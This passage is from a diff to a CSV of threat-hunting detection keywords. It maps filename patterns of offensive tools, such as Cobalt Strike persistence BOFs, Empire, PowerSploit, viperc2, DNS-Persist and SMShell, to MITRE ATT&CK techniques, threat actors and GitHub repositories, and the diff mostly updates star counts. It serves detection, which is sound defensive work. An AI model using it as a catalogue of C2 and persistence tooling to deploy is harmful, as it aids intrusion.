teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*Persistence.cpp*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Persistence.exe*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" -"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Persistence.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Persistence.psm1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Persistence.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Persistence/InstallWMI*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Persistence_AccountManipulation_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Persistence_Guard_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -14692,28 +14858,28 @@ "*Persistence_RegistryRunKeys_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Persistence_ScheduledTask_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Persistence_WinlogonHelperDLL_Windows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*PersistenceBOF.c*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*PersistenceBOF.exe*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*PersistenceBOF.c*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*PersistenceBOF.exe*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persistent-security/SMShell*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" -"*persist-ice-junction.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*persist-ice-monitor.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*persist-ice-shortcut.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*persist-ice-time.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*persist-ice-xll.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-junction.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-monitor.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*persist-ice-shortcut.o*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 